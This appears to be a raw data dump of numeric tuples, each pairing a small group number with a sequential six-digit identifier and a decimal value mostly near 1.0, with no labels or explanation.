(240, 274817, 0.14),
(306, 274817, 0.42),
(240, 274818, 0.84),
(240, 274819, 0.95669),
(240, 274820, 0.93331),
(240, 274821, 1.07331),
(240, 274822, 0.37331),
(240, 274823, 1.00331),
(240, 274824, 1.09669),
(240, 274825, 0.91),
(240, 274826, 1.00331),
(240, 274827, 1.00331),
(240, 274828, 1.23669),
(240, 274829, 0.98),
(240, 274830, 1.07331),
(240, 274831, 0.98),
(240, 274832, 1.05),
(240, 274833, 1.14331),
(240, 274834, 0.98),
(240, 274835, 1.02669),
(240, 274836, 1.19),
(240, 274837, 1.05),
(240, 274838, 1.19),
(240, 274839, 1.00331),
(240, 274840, 1.14331),
(240, 274841, 1.00331),
(240, 274842, 1.19),
(240, 274843, 1.05),
(240, 274844, 1.12),
(240, 274845, 1.12),
(240, 274846, 1.26),
(240, 274847, 1.14331),
(240, 274848, 1.14331),
(240, 274849, 1.12),
(240, 274850, 1.09669),
(240, 274851, 1.09669),
(240, 274852, 1.26),
(240, 274853, 1.02669),
(240, 274854, 1.12),
(240, 274855, 1.30669),
(240, 274856, 1.00331),
(240, 274857, 1.07331),
(240, 274858, 1.12),
(240, 274859, 0.88669),
(240, 274860, 0.98),
(240, 274861, 1.00331),
(240, 274862, 1.19),
(240, 274863, 1.02669),
(240, 274864, 1.12),
(240, 274865, 1.28331),
(240, 274866, 0.91),
(240, 274867, 0.98),
(240, 274868, 0.23331),
(240, 274869, 0.88669),
(240, 274870, 0.93331),
(240, 274871, 0.32669),
(240, 274872, 0.98),
(240, 274873, 1.07331),
(240, 274874, 0.32669),
(240, 274875, 0.95669),
(240, 274876, 1.00331),
(240, 274877, 1.00331),
(240, 274878, 1.09669),
(240, 274879, 0.60669),
(305, 274879, 0.60669),
(240, 274880, 1.12),
(240, 274881, 1.21331),
(240, 274882, 1.16669),
(240, 274883, 1.26),
(240, 274884, 0.65338),
(240, 274885, 2.19338),
(240, 274886, 2.56662),
(240, 274887, 0.46669),
(240, 274888, 1.07331),
(240, 274889, 1.14331),
(240, 274890, 1.00331),
(240, 274891, 1.07331),
(240, 274892, 0.32669),
(240, 274893, 0.95669),
(240, 274894, 1.09669),
(240, 274895, 1.14331),
(240, 274896, 1.28331),
(240, 275609, 0.98),
(240, 275610, 1.02669),
(240, 275611, 0.95669),
(240, 275612, 1.12),
(240, 275613, 1.00331),
(240, 275614, 1.00331),
(240, 275615, 1.12),
(240, 275616, 0.95669),
(240, 275617, 1.05),
(240, 275618, 0.91),
(240, 275619, 1.02669),
(240, 275620, 0.98),
(240, 275621, 1.09669),
(240, 275622, 1.16669),
(240, 275623, 1.28331),
(240, 275624, 1.33),
(240, 275625, 0.23331),
(240, 275626, 0.95669),
(240, 275627, 1.02669),
(240, 275628, 1.09669),
(240, 275629, 1.26),
(240, 275630, 0.88669),
(240, 275631, 0.95669),
(240, 275632, 0.69993),
(240, 275633, 1.72662),
(240, 275634, 1.96),
(240, 275635, 0.91),
(240, 275636, 1.09669),
(240, 275637, 0.91),
(240, 275638, 0.98),
(240, 275639, 0.18669),
(240, 275640, 0.91),
(240, 275641, 1.02669),
(240, 276101, 1.09669),
(240, 276102, 0.95669),
(240, 276103, 0.86331),
(240, 276104, 1.07331),
(240, 276105, 0.95669),
(240, 276106, 1.86662),
(240, 276107, 0.93331),
(240, 276108, 1.02669),
(240, 276109, 1.02669),
(240, 276110, 1.26),
(240, 276111, 1.02669),
(240, 276112, 1.02669),
(306, 276112, 1.02669),
(240, 276113, 1.05),
(240, 276114, 1.23669),
(240, 276115, 0.86331),
(240, 276116, 1.07331),
(240, 276117, 1.00331),
(240, 276118, 0.95669),
(240, 276119, 0.98),
(240, 276120, 0.98),
(240, 276121, 0.98),
(240, 276122, 1.02669),
(240, 276123, 1.09669),
(240, 276124, 1.02669),
(288, 276124, 1.02669),
(240, 276125, 0.93331),
(240, 276126, 0.95669),
(240, 276127, 1.16669),
(240, 276128, 0.93331),
(240, 276129, 1.09669),
(240, 276130, 1.09669),
(240, 276131, 1.02669),
(240, 276132, 0.95669),
(240, 276133, 1.09669),
(240, 276134, 1.14331),
(240, 276135, 1.09669),
(240, 276136, 1.26),
(240, 276137, 0.98),
(240, 276138, 1.09669),
(240, 276139, 0.28),
(240, 276140, 0.91),
(240, 276141, 0.98),
(240, 276142, 1.12),
(240, 276143, 1.33),
(240, 276144, 1.14331),
(240, 276145, 1.19),
(240, 276146, 1.02669),
(240, 276147, 1.12),
(240, 276148, 1.14331),
(240, 276149, 0.95669),
(240, 276150, 1.02669),
(240, 276151, 1.02669),
(240, 276152, 1.02669),
(306, 276152, 1.02669),
(240, 276153, 0.95669),
(240, 276154, 1.21331),
(240, 276155, 0.98),
(240, 276156, 1.09669),
(240, 276157, 1.28331),
(240, 276158, 1.00331),
(240, 276159, 0.93331),
(240, 276160, 1.02669),
(240, 276161, 1.14331),
(240, 276162, 1.00331),
(240, 276163, 1.07331),
(240, 276164, 1.16669),
(240, 276165, 0.95669),
(240, 276166, 1.09669),
(240, 276167, 1.07331),
(240, 276168, 1.09669),
(240, 276169, 1.12),
(240, 276170, 0.98),
(240, 276171, 1.23669),
(240, 276172, 1.00331),
(240, 276173, 1.30669),
(240, 276174, 1.00331),
(240, 276175, 1.19),
(240, 276176, 1.09669),
(241, 276663, 0.93331),
(241, 276664, 1.02669),
(241, 276665, 0.98),
(241, 276666, 1.05),
(241, 276667, 1.09669),
(241, 276668, 0.88669),
(241, 276669, 1.00331),
(241, 276670, 0.95669),
(241, 276671, 0.88669),
(241, 276672, 1.02669),
(241, 276673, 0.93331),
(241, 276674, 1.05),
(241, 276675, 0.95669),
(241, 276676, 1.16669),
(241, 276677, 0.18669),
(287, 276677, 0.18669),
(241, 276678, 0.88669),
(241, 276679, 1.00331),
(241, 276680, 1.00331),
(241, 276681, 1.00331),
(241, 276682, 1.26),
(241, 276683, 1.05),
(241, 276684, 1.12),
(241, 276685, 0.91),
(241, 276686, 1.02669),
(241, 276687, 0.95669),
(241, 276688, 0.91),
(241, 276689, 1.07331),
(241, 276690, 0.37331),
(241, 276691, 0.95669),
(241, 276692, 1.05),
(241, 277072, 0.09331),
(241, 277073, 0.84),
(241, 277074, 0.93331),
(241, 277360, 0.88669),
(241, 277361, 0.98),
(241, 277362, 1.12),
(241, 277363, 1.02669),
(241, 277364, 0.98),
(241, 277365, 0.93331),
(241, 277366, 0.98),
(241, 277367, 0.98),
(241, 277368, 1.05),
(241, 277369, 1.02669),
(241, 277370, 0.91),
(241, 277371, 0.98),
(241, 277372, 1.00331),
(241, 277373, 1.00331),
(241, 277374, 0.93331),
(241, 277375, 0.98),
(241, 277376, 1.14331),
(241, 277377, 1.00331),
(241, 277378, 1.00331),
(241, 277379, 0.95669),
(241, 277380, 1.00331),
(241, 277381, 0.95669),
(241, 277382, 0.84),
(241, 277383, 0.93331),
(241, 277384, 1.00331),
(241, 277385, 0.95669),
(288, 277385, 0.95669),
(241, 277386, 1.00331),
(241, 277387, 0.98),
(241, 277388, 0.91),
(241, 277389, 1.02669),
(241, 277390, 1.19),
(241, 277391, 1.07331),
(241, 277392, 0.98),
(241, 277393, 1.07331),
(241, 277394, 1.05),
(241, 277395, 1.05),
(241, 277396, 0.93331),
(241, 277397, 1.00331),
(241, 277398, 0.98),
(241, 277399, 1.09669),
(241, 277400, 1.02669),
(241, 277401, 0.88669),
(241, 277402, 1.02669),
(241, 277403, 1.00331),
(241, 277404, 0.32669),
(241, 277405, 1.00331),
(241, 277406, 1.12),
(242, 277913, 0.86331),
(242, 277914, 0.98),
(242, 277915, 0.93331),
(242, 277916, 1.09669),
(242, 277917, 0.98),
(242, 277918, 0.98),
(242, 277919, 1.21331),
(242, 277920, 0.93331),
(242, 277921, 1.09669),
(242, 277922, 0.32669),
(304, 277922, 0.65338),
(305, 277922, 0.65338),
(242, 277923, 0.98),
(242, 277924, 1.07331),
(242, 277925, 1.00331),
(242, 277926, 1.12),
(242, 277927, 3.08007),
(242, 277928, 1.09669),
(242, 277929, 2.28662),
(242, 277930, 0.95669),
(242, 277931, 1.16669),
(242, 277932, 1.09669),
(242, 277933, 1.21331),
(242, 277934, 0.91),
(242, 277935, 1.00331),
(242, 277936, 0.95669),
(242, 277937, 1.19),
(242, 277938, 1.00331),
(242, 277939, 1.26),
(242, 277940, 1.02669),
(242, 277941, 1.12),
(242, 277942, 1.12),
(242, 277943, 1.23669),
(242, 277944, 1.07331),
(242, 277945, 1.14331),
(242, 277946, 1.05),
(242, 277947, 1.00331),
(242, 277948, 1.09669),
(242, 277949, 1.07331),
(242, 277950, 1.14331),
(242, 277951, 1.14331),
(242, 277952, 1.30669),
(242, 277953, 1.02669),
(242, 277954, 1.09669),
(242, 277955, 0.98),
(242, 277956, 1.09669),
(242, 277957, 1.05),
(242, 277958, 1.16669),
(242, 277959, 3.00993),
(242, 277960, 1.09669),
(242, 277961, 1.14331),
(242, 277962, 1.12),
(242, 277963, 1.07331),
(242, 277964, 1.28331),
(242, 277965, 1.02669),
(242, 277966, 1.19),
(242, 277967, 2.1),
(242, 277968, 1.12),
(242, 277969, 1.21331),
(242, 277970, 1.16669),
(242, 277971, 2.05338),
(242, 277972, 1.19),
(242, 277973, 1.16669),
(242, 277974, 0.95669),
(242, 277975, 0.32669),
(242, 277976, 1.05),
(242, 277977, 1.12),
(242, 277978, 1.05),
(242, 277979, 0.65338),
(242, 277980, 0.93331),
(242, 277981, 0.98),
(242, 277982, 0.93331),
(242, 277983, 1.05),
(242, 277984, 1.00331),
(242, 277985, 0.93331),
(242, 277986, 1.02669),
(242, 277987, 0.32669),
(242, 277988, 0.93331),
(242, 277989, 1.07331),
(242, 277990, 1.07331),
(242, 277991, 0.98),
(242, 277992, 1.07331),
(242, 277993, 1.21331),
(242, 277994, 0.46669),
(242, 277995, 1.02669),
(242, 277996, 1.07331),
(242, 277997, 0.98),
(242, 277998, 1.05),
(242, 277999, 1.02669),
(242, 278000, 1.16669),
(242, 278001, 1.05),
(242, 278002, 1.21331),
(242, 278003, 0.32669),
(242, 278004, 1.00331),
(242, 278005, 1.12),
(242, 278006, 0.46669),
(242, 278007, 1.12),
(242, 278008, 1.23669),
(242, 278009, 1.16669),
(242, 278010, 0.46669),
(242, 278011, 1.05),
(242, 278012, 1.14331),
(242, 278013, 1.09669),
(242, 278014, 1.14331),
(242, 278015, 1.02669),
(242, 278016, 1.16669),
(242, 278017, 1.05),
(242, 278018, 1.14331),
(242, 278019, 1.05),
(242, 278020, 1.30669),
(242, 278021, 0.32669),
(242, 278022, 0.98),
(242, 278023, 1.21331),
(242, 278024, 0.56),
(242, 278025, 1.05),
(242, 278026, 1.23669),
(242, 278027, 0.32669),
(242, 278028, 0.95669),
(242, 278029, 1.14331),
(242, 278030, 1.12),
(242, 278031, 0.86331),
(242, 278032, 0.91),
(242, 278033, 1.16669),
(242, 278034, 1.35331),
(242, 278035, 1.00331),
(242, 278036, 1.09669),
(242, 278037, 0.32669),
(242, 278038, 0.95669),
(242, 278039, 1.05),
(242, 278935, 0.88669),
(242, 278936, 1.09669),
(242, 278937, 0.95669),
(242, 278938, 1.12),
(242, 278939, 1.05),
(242, 278940, 1.07331),
(242, 278941, 0.42),
(242, 278942, 1.02669),
(242, 278943, 1.26),
(242, 278944, 0.98),
(242, 278945, 1.05),
(242, 278946, 0.93331),
(242, 278947, 1.00331),
(242, 278948, 0.95669),
(242, 278949, 1.19),
(242, 278950, 1.00331),
(242, 278951, 1.16669),
(242, 278952, 0.98),
(242, 278953, 1.05),
(242, 278954, 0.46669),
(242, 278955, 1.00331),
(242, 278956, 1.09669),
(242, 278957, 1.00331),
(242, 278958, 1.12),
(242, 278959, 1.12),
(242, 278960, 1.07331),
(242, 278961, 1.30669),
(242, 278962, 1.26),
(306, 278963, 0.37331),
(242, 278963, 0.74662),
(242, 278964, 0.95669),
(242, 278965, 1.05),
(242, 278966, 1.00331),
(242, 278967, 1.07331),
(242, 278968, 1.14331),
(242, 278969, 1.28331),
(242, 278970, 1.16669),
(242, 278971, 1.26),
(242, 278972, 1.07331),
(242, 278973, 1.19),
(242, 278974, 1.82007),
(242, 278975, 1.07331),
(242, 278976, 1.19),
(242, 278977, 1.07331),
(242, 278978, 1.19),
(242, 278979, 1.19),
(242, 278980, 1.26),
(242, 278981, 0.37331),
(242, 278982, 0.98),
(242, 278983, 1.14331),
(242, 278984, 1.02669),
(242, 278985, 1.00331),
(242, 278986, 1.07331),
(242, 278987, 0.46669),
(242, 278988, 1.02669),
(242, 278989, 1.26),
(242, 278990, 0.28),
(242, 278991, 0.93331),
(242, 278992, 1.07331),
(242, 278993, 0.32669),
(242, 278994, 0.95669),
(242, 278995, 1.09669),
(242, 278996, 1.00331),
(242, 278997, 0.95669),
(242, 278998, 1.02669),
(242, 278999, 0.91),
(242, 279000, 1.05),
(242, 279001, 0.88669),
(242, 279002, 0.95669),
(242, 279003, 0.86331),
(242, 279004, 0.95669),
(242, 279005, 0.95669),
(242, 279006, 0.46662),
(242, 279007, 0.95669),
(242, 279008, 1.07331),
(242, 279009, 1.00331),
(242, 279010, 1.09669),
(242, 279011, 0.46662),
(242, 279012, 0.91),
(242, 279013, 1.02669),
(242, 279014, 0.88669),
(242, 279015, 1.05),
(242, 279531, 0.86331),
(242, 279532, 0.95669),
(242, 279533, 1.07331),
(242, 279534, 0.98),
(242, 279535, 0.93331),
(242, 279536, 1.14331),
(242, 279537, 1.07331),
(242, 279538, 1.02669),
(242, 279539, 1.12),
(242, 279540, 0.95669),
(242, 279541, 1.07331),
(242, 279542, 1.09669),
(242, 279543, 1.30669),
(242, 279544, 0.98),
(242, 279545, 1.09669),
(242, 279546, 1.16669),
(242, 279547, 1.09669),
(242, 279548, 0.86331),
(242, 279549, 0.91),
(242, 279550, 1.09669),
(242, 279551, 1.07331),
(242, 279552, 1.00331),
(306, 279552, 1.00331),
(242, 279553, 0.88669),
(242, 279554, 1.00331),
(242, 279555, 1.00331),
(305, 279556, 1.05),
(242, 279556, 2.1),
(242, 279557, 1.07331),
(242, 279558, 1.05),
(242, 279559, 1.09669),
(242, 279560, 0.95669),
(242, 279561, 1.09669),
(242, 279562, 0.93331),
(242, 279563, 0.91),
(242, 279564, 0.98),
(242, 279565, 1.96),
(242, 279566, 1.14331),
(242, 279567, 1.12),
(292, 279568, 0.86331),
(242, 279568, 1.72662),
(242, 279569, 0.95669),
(242, 279570, 0.98),
(242, 279571, 1.02669),
(242, 279572, 1.00331),
(242, 279573, 1.07331),
(242, 279574, 0.95669),
(242, 279575, 1.02669),
(242, 279576, 1.12),
(242, 279577, 0.91),
(242, 279578, 1.02669),
(242, 279579, 0.88669),
(242, 279580, 0.95669),
(242, 279581, 0.95669),
(242, 279582, 0.98),
(242, 279583, 0.88669),
(242, 279584, 1.00331),
(242, 279585, 0.91),
(306, 279585, 0.91),
(242, 279586, 0.98),
(242, 279587, 0.95669),
(242, 279588, 1.02669),
(242, 279589, 1.02669),
(242, 279590, 1.09669),
(242, 279591, 1.91338),
(242, 279592, 2.05338),
(242, 279593, 1.05),
(242, 279594, 1.12),
(242, 279595, 1.02669),
(242, 279596, 1.09669),
(242, 279597, 1.16669),
(242, 279598, 1.09669),
(242, 279599, 1.16669),
(242, 279600, 1.00331),
(242, 279601, 1.12),
(242, 279602, 1.05),
(242, 279603, 0.98),
(242, 279604, 1.14331),
(242, 279605, 2.05338),
(242, 279606, 1.09669),
(242, 279607, 1.14331),
(242, 279608, 0.93331),
(242, 279609, 1.05),
(242, 279610, 0.98),
(242, 279611, 0.93331),
(242, 279612, 1.02669),
(242, 279613, 1.00331),
(242, 279614, 1.12),
(242, 279615, 1.05),
(290, 279615, 1.05),
(242, 279616, 1.30669),
(242, 279617, 1.12),
(242, 279618, 0.95669),
(242, 279619, 1.07331),
(242, 279620, 1.00331),
(242, 279621, 1.07331),
(242, 279622, 1.00331),
(242, 279623, 1.12),
(242, 279624, 1.16669),
(242, 279625, 1.00331),
(242, 279626, 1.09669),
(242, 279627, 1.00331),
(242, 279628, 0.98),
(242, 279629, 1.19),
(242, 279630, 1.09669),
(242, 279631, 1.19),
(242, 279632, 0.46669),
(242, 279633, 1.00331),
(242, 279634, 1.12),
(243, 281732, 0.86331),
(243, 281850, 1.00331),
(243, 281851, 0.88669),
(243, 281852, 0.98),
(243, 281853, 1.07331),
(243, 281854, 1.19),
(243, 281855, 0.95669),
(243, 281856, 1.09669),
(243, 281857, 1.07331),
(243, 281858, 1.16669),
(243, 281859, 1.02669),
(243, 281860, 1.12),
(243, 281861, 1.09669),
(243, 281862, 1.19),
(243, 281863, 9.30981),
(243, 281864, 1.00331),
(243, 281865, 1.05),
(243, 281866, 1.28331),
(243, 281867, 1.14331),
(243, 281868, 2.61338),
(243, 281869, 1.12),
(243, 281870, 1.26),
(243, 281871, 1.02669),
(243, 281872, 1.07331),
(243, 281873, 1.07331),
(243, 281874, 1.19),
(243, 281875, 1.16669),
(243, 281876, 0.51331),
(243, 281877, 1.09669),
(243, 281878, 1.23669),
(243, 281879, 0.91),
(243, 281880, 1.12),
(243, 281881, 0.93331),
(243, 281882, 1.05),
(243, 281883, 0.93331),
(243, 281884, 0.98),
(243, 281885, 1.05),
(243, 281886, 1.14331),
(243, 281887, 1.00331),
(243, 281888, 0.95669),
(243, 281889, 1.19),
(243, 281890, 0.93331),
(243, 281891, 0.95669),
(243, 281892, 1.02669),
(243, 281893, 0.95669),
(243, 281894, 1.05),
(243, 281895, 1.23669),
(243, 281896, 1.14331),
(243, 281897, 1.19),
(243, 281898, 1.09669),
(243, 281899, 1.02669),
(243, 281900, 1.09669),
(243, 281901, 1.02669),
(243, 281902, 1.00331),
(243, 281903, 1.12),
(243, 281904, 0.93331),
(243, 281905, 1.00331),
(243, 281906, 1.05),
(243, 281907, 1.02669),
(243, 281908, 0.95669),
(243, 281909, 1.19),
(243, 281910, 0.98),
(243, 281911, 1.07331),
(243, 282396, 0.91),
(243, 282397, 0.95669),
(243, 282398, 0.91),
(243, 282399, 1.09669),
(243, 282400, 1.05),
(243, 282401, 1.14331),
(243, 282402, 1.02669),
(243, 282403, 1.23669),
(243, 282404, 0.98),
(243, 282405, 0.37331),
(243, 282406, 1.02669),
(243, 282407, 1.16669),
(243, 282408, 1.05),
(243, 282409, 0.37331),
(243, 282410, 0.98),
(243, 282411, 1.21331),
(243, 282412, 1.00331),
(243, 282413, 1.09669),
(243, 282414, 0.37331),
(243, 282415, 0.95669),
(243, 282416, 1.05),
(243, 282417, 0.32669),
(243, 282418, 0.93331),
(243, 282419, 1.05),
(243, 282420, 0.95669),
(243, 282421, 0.93331),
(243, 282422, 0.93331),
(243, 282423, 0.81669),
(243, 282424, 0.91),
(243, 282425, 0.93331),
(243, 282426, 1.07331),
(243, 282725, 0.88669),
(243, 282726, 1.00331),
(243, 282727, 0.98),
(243, 282728, 0.98),
(243, 282729, 1.07331),
(243, 282730, 0.88669),
(292, 282730, 1.77338),
(243, 282731, 1.00331),
(243, 282732, 0.98),
(243, 282733, 4.01324),
(243, 282734, 4.29324),
(243, 282735, 1.00331),
(243, 282736, 0.95669),
(243, 282737, 0.98),
(243, 282738, 0.95669),
(243, 282739, 0.88669),
(243, 282740, 0.95669),
(243, 282741, 0.98),
(243, 282742, 0.95669),
(243, 282743, 1.05),
(243, 282744, 0.95669),
(243, 282745, 1.02669),
(243, 282746, 1.21331),
(243, 282747, 0.91),
(243, 282748, 1.05),
(243, 282749, 1.02669),
(243, 282750, 1.02669),
(243, 282751, 0.98),
(243, 282752, 0.93331),
(243, 282753, 1.09669),
(243, 282754, 0.91),
(243, 282755, 1.07331),
(243, 282756, 1.02669),
(243, 282757, 1.26),
(244, 283819, 0.77),
(244, 283820, 1.00331),
(244, 283821, 0.88669),
(244, 283822, 0.98),
(244, 283823, 0.42),
(244, 283824, 0.95669),
(244, 283825, 1.00331),
(244, 283826, 2.73),
(244, 283827, 1.05),
(244, 283828, 1.12),
(244, 283829, 1.02669),
(244, 283830, 0.37331),
(244, 283831, 1.00331),
(244, 283832, 1.07331),
(244, 283833, 1.05),
(244, 283834, 1.05),
(244, 283835, 1.05),
(244, 283836, 1.00331),
(244, 283837, 1.16669),
(244, 283838, 1.14331),
(244, 283839, 0.93331),
(244, 283840, 1.05),
(244, 283841, 0.95669),
(244, 283842, 1.07331),
(244, 283843, 0.46669),
(244, 283844, 1.00331),
(244, 283845, 1.26),
(244, 283846, 0.95669),
(244, 283847, 0.95669),
(244, 283848, 0.98),
(244, 283849, 0.32669),
(244, 283850, 0.95669),
(244, 283851, 1.02669),
(244, 283852, 1.02669),
(244, 283853, 1.12),
(244, 283854, 0.98),
(244, 283855, 1.07331),
(244, 283856, 3.6),
(244, 283857, 3.84),
(244, 283858, 0.91),
(244, 283859, 1.00331),
(244, 284220, 0.88669),
(244, 284221, 1.00331),
(244, 284222, 0.91),
(244, 284223, 1.00331),
(244, 284224, 1.00331),
(244, 284225, 1.09669),
(244, 284226, 0.91),
(244, 284227, 1.14331),
(244, 284228, 1.09669),
(244, 284229, 1.16669),
(244, 284230, 0.51331),
(244, 284231, 1.02669),
(244, 284232, 1.12),
(244, 284233, 0.56),
(244, 284234, 1.05),
(244, 284235, 1.19),
(244, 284236, 0.23331),
(244, 284237, 0.93331),
(244, 284238, 1.00331),
(244, 284239, 0.28),
(244, 284240, 0.91),
(244, 284241, 1.00331),
(244, 284496, 0.84),
(305, 284496, 0.84),
(244, 284497, 0.93331),
(244, 284498, 0.84),
(244, 284499, 0.91),
(244, 284500, 0.86331),
(244, 284501, 0.93331),
(244, 284502, 0.95669),
(244, 284503, 0.84),
(244, 284504, 0.95669),
(244, 284505, 0.84),
(244, 284506, 0.93331),
(244, 284507, 0.95669),
(244, 284508, 0.91),
(244, 284509, 1.00331),
(244, 284510, 0.98),
(244, 284511, 0.98),
(244, 284512, 1.02669),
(244, 284513, 0.88669),
(244, 284514, 0.98),
(244, 284515, 1.00331),
(244, 284516, 1.12),
(244, 284517, 0.88669),
(244, 284518, 1.02669),
(244, 284519, 0.98),
(244, 284520, 1.09669),
(244, 284521, 0.95669),
(244, 284522, 1.02669),
(245, 284805, 0.95669),
(245, 284806, 1.05),
(245, 284807, 0.51331),
(245, 284808, 1.09669),
(245, 284809, 1.14331),
(245, 284810, 1.02669),
(245, 284811, 1.14331),
(245, 284812, 0.98),
(245, 284813, 1.09669),
(245, 284814, 0.23331),
(245, 284815, 0.88669),
(245, 284816, 0.98),
(245, 284817, 0.32669),
(245, 284818, 0.98),
(245, 284819, 1.12),
(245, 284820, 1.00331),
(245, 284821, 1.05),
(245, 284822, 0.46669),
(245, 284823, 1.05),
(245, 284824, 1.19),
(245, 284825, 1.02669),
(245, 284826, 1.14331),
(245, 284827, 1.07331),
(245, 284828, 1.07331),
(245, 284829, 0.95669),
(245, 284830, 1.14331),
(245, 285036, 0.91),
(245, 285037, 1.00331),
(245, 285038, 1.02669),
(245, 285039, 0.28),
(245, 285040, 1.00331),
(245, 285041, 1.09669),
(245, 285042, 0.98),
(245, 285043, 1.07331),
(245, 285044, 0.28),
(245, 285045, 1.02669),
(245, 285046, 1.09669),
(245, 285047, 1.02669),
(245, 285048, 1.09669),
(245, 285049, 1.00331),
(245, 285050, 1.09669),
(245, 285051, 0.95669),
(245, 285052, 1.02669),
(245, 285053, 1.05),
(245, 285054, 1.16669),
(245, 285159, 1.07331),
(245, 285160, 1.00331),
(245, 285161, 1.00331),
(245, 285162, 1.07331),
(246, 285354, 0.88669),
(246, 285355, 1.02669),
(246, 285356, 0.91),
(246, 285357, 0.95669),
(246, 285423, 1.16669),
(246, 285424, 1.02669),
(246, 285425, 0.95669),
(246, 285426, 1.26),
(246, 285427, 0.98),
(246, 285428, 1.16669),
(246, 285429, 0.98),
(246, 285430, 1.00331),
(246, 285431, 1.09669),
(246, 285432, 1.07331),
(246, 285433, 1.21331),
(246, 285434, 8.93019),
(246, 285435, 1.07331),
(246, 285436, 1.21331),
(246, 285437, 1.19),
(246, 285438, 0.14),
(246, 285439, 0.81669),
(246, 285440, 0.86331),
(246, 285441, 1.07331),
(246, 285442, 1.30669),
(246, 285443, 1.09669),
(246, 285444, 1.21331),
(246, 285445, 1.05),
(246, 285446, 1.21331),
(246, 285447, 1.05),
(246, 285448, 1.12),
(246, 285449, 1.12),
(246, 285450, 1.00331),
(246, 285451, 1.05),
(246, 285749, 2.14662),
(246, 285750, 1.26),
(246, 285751, 1.37669),
(246, 285752, 1.40007),
(246, 285753, 0.98),
(246, 285754, 1.07331),
(246, 285755, 0.98),
(246, 285756, 1.07331),
(246, 285757, 0.98),
(246, 285758, 1.07331),
(246, 285759, 0.28),
(246, 285760, 0.95669),
(246, 285761, 1.07331),
(246, 285942, 1.63338),
(246, 285943, 0.88669),
(246, 285944, 1.07331),
(246, 285945, 0.81669),
(246, 285946, 0.88669),
(246, 285947, 0.84),
(246, 285948, 0.95669),
(246, 285949, 0.88669),
(246, 285950, 1.00331),
(246, 285951, 0.91),
(246, 285952, 0.98),
(246, 285953, 0.93331),
(246, 285954, 1.00331),
(246, 285955, 1.00331),
(246, 285956, 1.14331),
(246, 285957, 0.98),
(246, 285958, 1.09669),
(246, 285959, 0.95669),
(246, 285960, 1.16669),
(246, 285961, 1.12),
(246, 285962, 2.1),
(246, 285963, 3.08007),
(246, 285964, 1.09669),
(246, 285965, 1.09669),
(246, 285966, 1.14331),
(246, 285967, 1.16669),
(246, 285968, 1.12),
(246, 285969, 1.19),
(247, 286473, 1.12),
(247, 286474, 0.88669),
(247, 286475, 0.98),
(247, 286476, 0.88669),
(247, 286477, 0.95669),
(247, 286478, 0.98),
(247, 286479, 1.09669),
(247, 286480, 1.07331),
(247, 286481, 1.19),
(247, 286482, 0.37331),
(247, 286483, 0.98),
(247, 286484, 1.02669),
(247, 286697, 4.17981),
(247, 286698, 8.55),
(247, 286699, 9.87981),
(247, 286700, 0.98),
(247, 286701, 1.07331),
(247, 286702, 0.95669),
(247, 286703, 1.07331),
(247, 286829, 0.95669),
(247, 286830, 1.02669),
(247, 286831, 0.95669),
(247, 286832, 1.00331),
(247, 286833, 0.93331),
(247, 286834, 1.07331),
(247, 286835, 1.00331),
(247, 286836, 1.00331),
(247, 286837, 0.95669),
(247, 286838, 1.07331),
(247, 286839, 0.98),
(247, 286840, 1.26),
(247, 286841, 1.02669),
(247, 286842, 1.35331),
(247, 286843, 1.00331),
(247, 286844, 1.16669),
(247, 286845, 1.00331),
(247, 286846, 1.07331),
(247, 286847, 1.09669),
(247, 286848, 1.19),
(247, 286849, 1.05),
(247, 286850, 1.09669),
(247, 286851, 0.98),
(247, 286852, 1.09669),
(247, 286853, 1.12),
(247, 286854, 1.19),
(248, 287396, 1.14331),
(248, 287397, 1.26),
(248, 287398, 0.93331),
(248, 287399, 1.14331),
(248, 287400, 0.93331),
(248, 287401, 1.05),
(248, 287402, 1.19),
(248, 287403, 1.4),
(248, 287404, 0.37331),
(248, 287405, 1.00331),
(248, 287406, 1.07331),
(248, 287407, 1.07331),
(248, 287408, 1.14331),
(248, 287409, 1.12),
(248, 287410, 1.33),
(248, 287411, 1.02669),
(248, 287412, 1.19),
(248, 287413, 0.84),
(248, 287414, 0.88669),
(248, 287415, 1.07331),
(248, 287416, 1.21331),
(248, 287417, 1.09669),
(248, 287418, 1.21331),
(248, 287419, 1.00331),
(248, 287420, 1.07331),
(248, 287421, 0.93331),
(248, 287422, 1.00331),
(248, 287656, 0.46669),
(248, 287657, 1.09669),
(248, 287658, 1.21331),
(248, 287659, 1.07331),
(248, 287660, 1.26),
(248, 287661, 0.93331),
(248, 287662, 1.09669),
(248, 287663, 0.23331),
(248, 287664, 0.88669),
(248, 287665, 1.00331),
(248, 287666, 0.88669),
(248, 287667, 0.95669),
(248, 287821, 0.91),
(248, 287822, 1.05),
(248, 287823, 0.95669),
(248, 287824, 1.07331),
(248, 287825, 1.05),
(248, 287826, 1.05),
(248, 287827, 0.93331),
(248, 287828, 1.00331),
(248, 287829, 1.07331),
(248, 287830, 0.91),
(248, 287831, 1.00331),
(248, 287832, 0.93331),
(248, 287833, 1.05),
(248, 287834, 1.00331),
(248, 287835, 1.09669),
(248, 287836, 0.95669),
(248, 287837, 1.05),
(248, 287838, 1.05),
(248, 287839, 1.14331),
(249, 288439, 0.42),
(249, 288440, 1.05),
(249, 288441, 1.14331),
(249, 288442, 1.00331),
(249, 288443, 0.60669),
(249, 288444, 1.12),
(249, 288445, 1.30669),
(249, 288446, 1.14331),
(249, 288447, 1.21331),
(249, 288448, 0.95669),
(249, 288449, 1.09669),
(249, 288698, 0.86331),
(249, 288699, 0.95669),
(249, 288700, 0.95669),
(249, 288701, 1.05),
(249, 288702, 1.16669),
(249, 288703, 0.32669),
(249, 288704, 0.93331),
(249, 288705, 1.21331),
(249, 288706, 0.95669),
(249, 288707, 1.02669),
(249, 288708, 0.93331),
(249, 288709, 1.05),
(249, 288710, 0.95669),
(249, 288711, 1.09669),
(249, 288712, 1.00331),
(249, 288713, 1.14331),
(249, 288714, 0.56661),
(249, 288715, 2.26661),
(249, 288716, 2.38),
(249, 288717, 0.56661),
(249, 288718, 2.21),
(249, 288864, 0.95669),
(249, 288865, 1.05),
(249, 288866, 0.91),
(299, 288866, 0.91),
(249, 288867, 1.12),
(249, 288868, 0.95669),
(249, 288869, 1.09669),
(249, 288870, 0.88669),
(249, 288871, 0.95669),
(249, 288872, 0.95669),
(249, 288873, 1.02669),
(249, 288874, 0.93331),
(249, 288875, 1.05),
(249, 288876, 0.95669),
(249, 288877, 1.07331),
(249, 288878, 0.93331),
(249, 288879, 1.02669),
(249, 288880, 1.00331),
(249, 288881, 1.14331),
(249, 288882, 0.98),
(249, 288883, 1.09669),
(249, 288884, 1.09669),
